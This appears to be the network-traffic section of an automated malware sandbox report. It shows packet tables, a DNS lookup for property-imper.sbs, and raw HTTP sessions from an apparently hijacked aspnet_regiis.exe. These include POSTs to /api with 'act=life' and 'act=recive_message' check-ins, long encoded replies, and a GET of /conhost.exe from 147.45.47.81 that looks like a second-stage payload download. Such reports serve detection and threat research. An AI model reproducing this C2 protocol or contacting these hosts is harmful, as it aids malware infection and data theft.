                                                                                  Nov 23, 2024 03:11:14.943262100 CET49712443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:14.983334064 CET44349712104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:15.741034031 CET44349712104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:15.741156101 CET44349712104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:15.741225004 CET49712443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:15.741372108 CET49712443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:15.741396904 CET44349712104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:15.987951040 CET49714443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:15.988029957 CET44349714104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:15.988112926 CET49714443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:15.988413095 CET49714443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:15.988430977 CET44349714104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:17.297530890 CET44349714104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:17.297653913 CET49714443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:17.298886061 CET49714443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:17.298899889 CET44349714104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:17.299128056 CET44349714104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:17.307059050 CET49714443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:17.307176113 CET49714443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:17.307208061 CET44349714104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:17.307490110 CET49714443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:17.307498932 CET44349714104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:18.236356020 CET44349714104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:18.236442089 CET44349714104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:18.236511946 CET49714443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:18.236634016 CET49714443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:18.236639977 CET44349714104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:18.568764925 CET49717443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:18.568845034 CET44349717104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:18.568928957 CET49717443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:18.569279909 CET49717443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:18.569314957 CET44349717104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:19.787602901 CET44349717104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:19.787710905 CET49717443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:19.789128065 CET49717443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:19.789154053 CET44349717104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:19.789402008 CET44349717104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:19.790788889 CET49717443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:19.790875912 CET49717443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:19.790888071 CET44349717104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:20.533324003 CET44349717104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:20.533409119 CET44349717104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:20.533611059 CET49717443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:20.533739090 CET49717443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:20.533781052 CET44349717104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:20.947491884 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:20.947544098 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:20.947633982 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:20.947943926 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:20.947954893 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.208698034 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.208786964 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.223342896 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.223361969 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.223591089 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.231755972 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.233123064 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.233153105 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.233686924 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.233720064 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.233994961 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.234041929 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.234716892 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.234749079 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.236563921 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.236597061 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.236769915 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.236800909 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.236814022 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.236825943 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.236972094 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.237000942 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.237020969 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.237169027 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.237193108 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.279372931 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.279553890 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.279577017 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.279603004 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.279625893 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:22.279656887 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:22.279675961 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:24.952424049 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:24.952503920 CET44349718104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:24.952666044 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:24.953282118 CET49718443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:25.003704071 CET49732443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:25.003732920 CET44349732104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:25.003844023 CET49732443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:25.004118919 CET49732443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:25.004128933 CET44349732104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:26.257138014 CET44349732104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:26.257251024 CET49732443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:26.258493900 CET49732443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:26.258502960 CET44349732104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:26.258761883 CET44349732104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:26.260010004 CET49732443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:26.260036945 CET49732443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:26.260077000 CET44349732104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:26.990623951 CET44349732104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:26.990704060 CET44349732104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:26.990762949 CET49732443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:26.990906000 CET49732443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:26.990921021 CET44349732104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:26.990931034 CET49732443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:26.990936041 CET44349732104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:26.993880033 CET4974080192.168.2.5147.45.47.81
                                                                                  Nov 23, 2024 03:11:27.113317966 CET8049740147.45.47.81192.168.2.5
                                                                                  Nov 23, 2024 03:11:27.113434076 CET4974080192.168.2.5147.45.47.81
                                                                                  Nov 23, 2024 03:11:27.113620043 CET4974080192.168.2.5147.45.47.81
                                                                                  Nov 23, 2024 03:11:27.232997894 CET8049740147.45.47.81192.168.2.5
                                                                                  Nov 23, 2024 03:11:49.072151899 CET8049740147.45.47.81192.168.2.5
                                                                                  Nov 23, 2024 03:11:49.072283030 CET4974080192.168.2.5147.45.47.81
                                                                                  Nov 23, 2024 03:11:49.105950117 CET4974080192.168.2.5147.45.47.81
                                                                                  Nov 23, 2024 03:11:49.225545883 CET8049740147.45.47.81192.168.2.5
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 23, 2024 03:11:06.461883068 CET5659753192.168.2.51.1.1.1
                                                                                  Nov 23, 2024 03:11:06.801789045 CET53565971.1.1.1192.168.2.5
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Nov 23, 2024 03:11:06.461883068 CET192.168.2.51.1.1.10x1942Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Nov 23, 2024 03:11:06.801789045 CET1.1.1.1192.168.2.50x1942No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                  Nov 23, 2024 03:11:06.801789045 CET1.1.1.1192.168.2.50x1942No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                  • property-imper.sbs
                                                                                  • 147.45.47.81
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.549740147.45.47.8180768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 23, 2024 03:11:27.113620043 CET198OUTGET /conhost.exe HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Host: 147.45.47.81


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.549704104.21.33.116443768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 02:11:08 UTC265OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 8
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 02:11:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                  Data Ascii: act=life
                                                                                  2024-11-23 02:11:08 UTC1011INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 02:11:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=tq4uad7k2j3jfk5m3v8acs58d0; expires=Tue, 18-Mar-2025 19:57:47 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bzSdp695pWYOIhxcpbGvVWVX5vSiYVa9y7MlUiSz4Py77QfgGG0QP1BnGbfPASSMP2wEDdz4VFrQ5va8FxVTVcNj9EYkSvnWj%2BO2K6htIo8eD4PGTezitNNxGhS1rwubD6i0%2BmY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e6da0799e794239-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1782661&cwnd=227&unsent_bytes=0&cid=63886be88558d705&ts=923&x=0"
                                                                                  2024-11-23 02:11:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                  Data Ascii: 2ok
                                                                                  2024-11-23 02:11:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.549706104.21.33.116443768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 02:11:10 UTC266OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 52
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 02:11:10 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 26 6a 3d
                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@benzoyolo&j=
                                                                                  2024-11-23 02:11:11 UTC1015INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 02:11:11 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=cl6brs7v5lm06hat9gtdoh00u7; expires=Tue, 18-Mar-2025 19:57:49 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GzjoWEFgW5s8ohmE2aVK8Z9CGwF9BQI%2BgMaszQoAmZ%2FZPpdynnSEwJc2Vj5%2BOAOW6xMjPhEirHX64JfHI45wiPYugclR2L4yi%2BzzWuxQcGKDeyQ8JyQlEU2xf9zgzyQMwtydzXk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e6da087ef2280d9-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1640&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=1709601&cwnd=252&unsent_bytes=0&cid=5d164186d424bef1&ts=762&x=0"
                                                                                  2024-11-23 02:11:11 UTC354INData Raw: 34 34 36 63 0d 0a 59 53 32 50 5a 42 71 6b 49 63 48 73 76 75 62 72 54 42 51 64 4e 4d 4a 30 4e 78 56 78 58 57 30 50 53 31 65 4b 41 6d 4c 4e 66 4b 41 61 44 2f 6c 47 49 4a 41 4e 34 35 2f 62 78 4e 45 34 5a 6d 68 52 37 6c 5a 57 63 56 4e 6e 43 32 34 6e 4a 4f 38 75 51 4c 73 52 67 6c 74 4c 37 67 68 70 77 51 33 6a 69 63 62 45 30 52 64 76 50 31 47 73 56 67 30 33 46 44 63 50 62 69 63 31 36 32 6b 4e 76 52 44 44 43 55 48 6f 44 48 2f 48 52 61 43 41 30 34 4f 4f 4b 58 56 33 57 71 73 5a 58 33 68 54 63 55 39 71 4d 58 57 77 49 43 2b 6f 43 4d 45 73 54 50 77 50 4f 4e 6b 4e 75 73 37 62 69 4d 6c 32 4e 6e 78 52 6f 42 68 52 63 52 6f 31 42 57 63 76 4e 4f 35 6f 45 71 51 61 79 41 6c 50 36 77 31 31 7a 6c 47 74 69 74 53 49 69 43 4e 31 50 78 6a 67 45 55 30 33 53 33 39 63 58 79 6f 6b 2b
                                                                                  Data Ascii: 446cYS2PZBqkIcHsvubrTBQdNMJ0NxVxXW0PS1eKAmLNfKAaD/lGIJAN45/bxNE4ZmhR7lZWcVNnC24nJO8uQLsRgltL7ghpwQ3jicbE0RdvP1GsVg03FDcPbic162kNvRDDCUHoDH/HRaCA04OOKXV3WqsZX3hTcU9qMXWwIC+oCMEsTPwPONkNus7biMl2NnxRoBhRcRo1BWcvNO5oEqQayAlP6w11zlGtitSIiCN1PxjgEU03S39cXyok+
                                                                                  2024-11-23 02:11:11 UTC1369INData Raw: 79 30 4f 78 68 74 65 50 6a 44 78 39 64 6c 75 74 46 6c 68 39 48 44 77 50 61 69 4d 2f 35 32 6f 45 6f 68 50 45 41 30 2b 74 53 44 6a 42 57 2b 50 57 6e 4b 65 4d 50 6e 46 7a 51 4f 49 73 46 57 68 64 4a 6b 39 71 4a 58 57 77 49 41 69 71 48 63 45 49 51 4f 34 4f 63 39 52 44 73 59 6a 52 67 5a 73 6f 63 33 46 63 6f 77 52 66 65 52 55 38 42 6d 59 67 4d 4f 39 6b 51 4f 46 65 78 52 73 50 74 55 5a 5a 79 30 69 76 68 4d 75 45 79 54 45 34 5a 68 61 6e 47 68 55 76 55 7a 73 4f 61 53 67 78 35 6d 34 45 6f 78 6a 4d 44 6b 44 72 44 48 6a 42 53 61 75 47 33 59 6d 43 49 58 5a 36 57 36 51 51 57 58 59 57 66 30 45 74 4c 69 32 6f 4f 45 43 42 47 63 45 52 44 64 67 46 64 73 68 45 74 63 37 44 79 70 42 75 63 58 4d 57 2b 46 5a 62 63 68 77 74 44 6e 38 73 4f 2f 70 73 42 61 6b 54 77 51 31 50 36 41 46
                                                                                  Data Ascii: y0OxhtePjDx9dlutFlh9HDwPaiM/52oEohPEA0+tSDjBW+PWnKeMPnFzQOIsFWhdJk9qJXWwIAiqHcEIQO4Oc9RDsYjRgZsoc3FcowRfeRU8BmYgMO9kQOFexRsPtUZZy0ivhMuEyTE4ZhanGhUvUzsOaSgx5m4EoxjMDkDrDHjBSauG3YmCIXZ6W6QQWXYWf0EtLi2oOECBGcERDdgFdshEtc7DypBucXMW+FZbchwtDn8sO/psBakTwQ1P6AF
                                                                                  2024-11-23 02:11:11 UTC1369INData Raw: 63 37 44 79 70 42 75 63 58 4d 57 2b 46 5a 5a 66 68 4d 30 42 57 6b 70 4d 75 56 6c 41 36 67 64 7a 77 52 46 34 77 46 38 79 6b 71 75 69 4e 79 44 6a 53 74 6b 65 6c 2b 73 47 68 55 35 55 7a 67 58 4c 58 46 31 78 32 63 57 72 44 48 42 45 6b 61 74 47 54 62 66 41 36 53 43 6e 4e 7a 4a 4b 58 4e 33 58 61 59 65 56 57 55 57 4d 51 52 73 49 7a 50 70 62 51 79 70 48 73 4d 44 53 65 45 47 66 38 46 52 73 59 76 61 6c 6f 4e 75 4f 44 39 52 75 46 59 4e 4e 79 55 76 47 48 77 2f 64 39 31 6a 44 71 45 5a 31 45 4e 51 6f 78 38 34 77 55 2f 6a 31 70 79 50 69 53 4a 78 64 31 43 6b 48 6c 70 34 47 69 30 4f 59 53 63 6e 37 32 41 4a 6f 52 48 4f 43 6b 4c 71 43 33 50 4d 54 71 65 4a 33 63 54 48 62 6e 46 6e 46 76 68 57 59 32 63 65 4d 79 46 6d 4a 54 79 6f 66 30 36 32 58 73 55 50 44 37 56 47 66 4d 70 4c
                                                                                  Data Ascii: c7DypBucXMW+FZZfhM0BWkpMuVlA6gdzwRF4wF8ykquiNyDjStkel+sGhU5UzgXLXF1x2cWrDHBEkatGTbfA6SCnNzJKXN3XaYeVWUWMQRsIzPpbQypHsMDSeEGf8FRsYvaloNuOD9RuFYNNyUvGHw/d91jDqEZ1ENQox84wU/j1pyPiSJxd1CkHlp4Gi0OYScn72AJoRHOCkLqC3PMTqeJ3cTHbnFnFvhWY2ceMyFmJTyof062XsUPD7VGfMpL
                                                                                  2024-11-23 02:11:11 UTC1369INData Raw: 47 4d 4b 6e 46 37 55 4b 39 57 47 7a 63 55 4a 30 38 31 61 52 72 50 56 55 4b 4f 4a 49 49 63 41 66 52 47 66 38 6f 44 2b 38 37 51 68 34 55 6d 65 58 6c 66 72 42 78 63 66 42 38 30 43 32 45 67 4d 4f 35 68 42 61 6f 66 78 67 39 46 36 77 56 37 79 55 79 73 68 70 7a 4b 79 53 6c 75 50 77 37 67 4d 30 4a 38 48 54 6c 50 63 6d 63 73 71 47 63 4d 37 30 61 43 44 30 62 72 41 48 33 4b 51 71 57 47 32 59 79 4e 4c 33 42 35 56 61 38 53 55 48 59 63 4f 77 4e 6a 49 7a 54 70 62 41 75 67 46 63 64 44 41 61 30 42 59 49 59 62 34 37 2f 66 6b 70 34 2b 65 6a 39 4a 37 67 38 56 63 42 39 2f 56 79 30 6f 4a 2b 4a 71 44 71 6f 52 78 77 42 41 36 67 74 2b 79 6b 6d 71 68 74 71 4c 67 44 78 31 63 31 69 6e 47 46 6c 35 48 6a 55 4d 59 47 6c 37 71 47 63 59 37 30 61 43 4c 30 6a 67 4b 48 50 4b 52 4f 4f 52 6b
                                                                                  Data Ascii: GMKnF7UK9WGzcUJ081aRrPVUKOJIIcAfRGf8oD+87Qh4UmeXlfrBxcfB80C2EgMO5hBaofxg9F6wV7yUyshpzKySluPw7gM0J8HTlPcmcsqGcM70aCD0brAH3KQqWG2YyNL3B5Va8SUHYcOwNjIzTpbAugFcdDAa0BYIYb47/fkp4+ej9J7g8VcB9/Vy0oJ+JqDqoRxwBA6gt+ykmqhtqLgDx1c1inGFl5HjUMYGl7qGcY70aCL0jgKHPKROORk
                                                                                  2024-11-23 02:11:11 UTC1369INData Raw: 32 65 45 37 67 54 68 56 42 46 43 38 66 62 6d 73 45 2f 6d 4d 57 70 42 50 4f 51 31 43 6a 48 7a 6a 42 54 2b 50 57 6e 49 4b 47 4a 33 56 77 56 36 6b 61 57 48 49 61 4f 67 35 72 4c 54 2f 69 59 41 61 70 48 38 63 4a 54 4f 77 4d 63 63 46 4c 70 49 33 4f 78 4d 64 75 63 57 63 57 2b 46 5a 38 63 41 45 78 48 79 30 32 65 2f 45 67 42 36 4e 65 6d 6b 4e 4c 35 77 6c 38 77 55 2b 6c 69 39 71 4a 69 43 46 33 66 31 6d 6b 48 56 78 78 45 6a 49 4b 59 43 30 6e 34 6d 73 50 6f 78 66 4f 44 67 2b 6a 52 6e 2f 65 41 2f 76 4f 37 59 6d 48 49 48 46 70 46 72 39 59 54 44 63 55 4d 30 38 31 61 54 54 6b 62 77 4f 67 48 63 45 43 52 66 38 55 64 4d 39 4c 70 6f 4c 58 69 6f 38 38 63 48 42 66 6f 78 56 63 63 42 73 7a 42 57 34 75 64 61 59 67 42 37 64 65 6d 6b 4e 73 2b 68 5a 31 68 6c 7a 74 6c 35 79 44 68 57
                                                                                  Data Ascii: 2eE7gThVBFC8fbmsE/mMWpBPOQ1CjHzjBT+PWnIKGJ3VwV6kaWHIaOg5rLT/iYAapH8cJTOwMccFLpI3OxMducWcW+FZ8cAExHy02e/EgB6NemkNL5wl8wU+li9qJiCF3f1mkHVxxEjIKYC0n4msPoxfODg+jRn/eA/vO7YmHIHFpFr9YTDcUM081aTTkbwOgHcECRf8UdM9LpoLXio88cHBfoxVccBszBW4udaYgB7demkNs+hZ1hlztl5yDhW
                                                                                  2024-11-23 02:11:11 UTC1369INData Raw: 73 68 4e 54 65 42 77 32 42 6d 6b 68 4e 75 68 6b 42 4b 67 62 77 51 39 45 36 67 56 33 77 6b 71 74 68 39 50 45 78 32 35 78 5a 78 62 34 56 6e 52 73 45 44 4d 43 4c 54 5a 37 38 53 41 48 6f 31 36 61 51 30 50 6a 41 33 6a 4d 52 61 65 4c 32 6f 36 4d 4c 6e 31 38 57 61 51 51 55 58 67 54 4e 41 5a 73 4c 7a 44 69 61 77 61 69 48 63 51 46 44 36 4e 47 66 39 34 44 2b 38 37 38 6e 34 51 69 63 54 39 4a 37 67 38 56 63 42 39 2f 56 79 30 69 4f 65 78 6e 41 4b 49 64 79 67 5a 4c 35 77 4e 34 7a 6c 47 72 6a 74 75 57 6d 79 35 2f 65 6c 71 6a 46 6c 46 78 47 6a 6b 4d 61 57 6c 37 71 47 63 59 37 30 61 43 4c 6b 50 71 4c 33 2f 64 41 37 7a 41 78 63 53 4f 49 6a 59 6e 46 71 45 64 58 33 67 65 50 41 6c 75 49 6a 44 69 59 51 65 6e 45 39 41 41 51 4f 49 43 65 4d 6c 46 70 59 2f 54 67 6f 34 6e 64 33 64
                                                                                  Data Ascii: shNTeBw2BmkhNuhkBKgbwQ9E6gV3wkqth9PEx25xZxb4VnRsEDMCLTZ78SAHo16aQ0PjA3jMRaeL2o6MLn18WaQQUXgTNAZsLzDiawaiHcQFD6NGf94D+878n4QicT9J7g8VcB9/Vy0iOexnAKIdygZL5wN4zlGrjtuWmy5/elqjFlFxGjkMaWl7qGcY70aCLkPqL3/dA7zAxcSOIjYnFqEdX3gePAluIjDiYQenE9AAQOICeMlFpY/Tgo4nd3d
                                                                                  2024-11-23 02:11:11 UTC1369INData Raw: 30 6b 30 4b 51 56 71 4f 54 4c 2f 62 30 44 68 58 73 31 44 46 39 52 47 63 63 46 59 73 70 6a 52 6c 49 35 75 53 54 45 57 75 46 59 4e 4e 79 59 38 41 57 4d 75 49 2f 6b 74 4a 37 6b 55 78 52 4e 49 2b 67 6b 34 69 41 4f 6c 7a 6f 54 58 78 32 35 79 62 68 62 34 52 67 63 73 52 6d 78 59 50 58 73 71 70 6e 6c 41 75 56 36 61 55 51 47 74 46 44 69 65 41 2b 53 4e 7a 70 61 50 4c 57 42 38 45 5a 34 6f 63 6d 30 65 4f 52 68 38 46 77 76 76 65 67 32 70 43 64 4e 50 57 75 34 49 64 73 46 56 34 38 43 63 69 38 6c 32 54 7a 38 65 34 43 6b 62 4e 77 74 2f 56 79 30 63 4e 75 5a 75 42 37 6b 50 6a 79 52 56 34 41 42 76 31 77 50 74 7a 74 72 45 30 58 34 34 50 31 4b 78 56 67 30 6e 51 57 52 61 50 6e 35 6c 75 6e 39 4f 74 6c 37 55 51 78 65 2f 53 44 6a 55 41 2f 76 4f 6d 34 65 62 50 48 42 38 51 4b 4e 52
                                                                                  Data Ascii: 0k0KQVqOTL/b0DhXs1DF9RGccFYspjRlI5uSTEWuFYNNyY8AWMuI/ktJ7kUxRNI+gk4iAOlzoTXx25ybhb4RgcsRmxYPXsqpnlAuV6aUQGtFDieA+SNzpaPLWB8EZ4ocm0eORh8Fwvveg2pCdNPWu4IdsFV48Cci8l2Tz8e4CkbNwt/Vy0cNuZuB7kPjyRV4ABv1wPtztrE0X44P1KxVg0nQWRaPn5lun9Otl7UQxe/SDjUA/vOm4ebPHB8QKNR
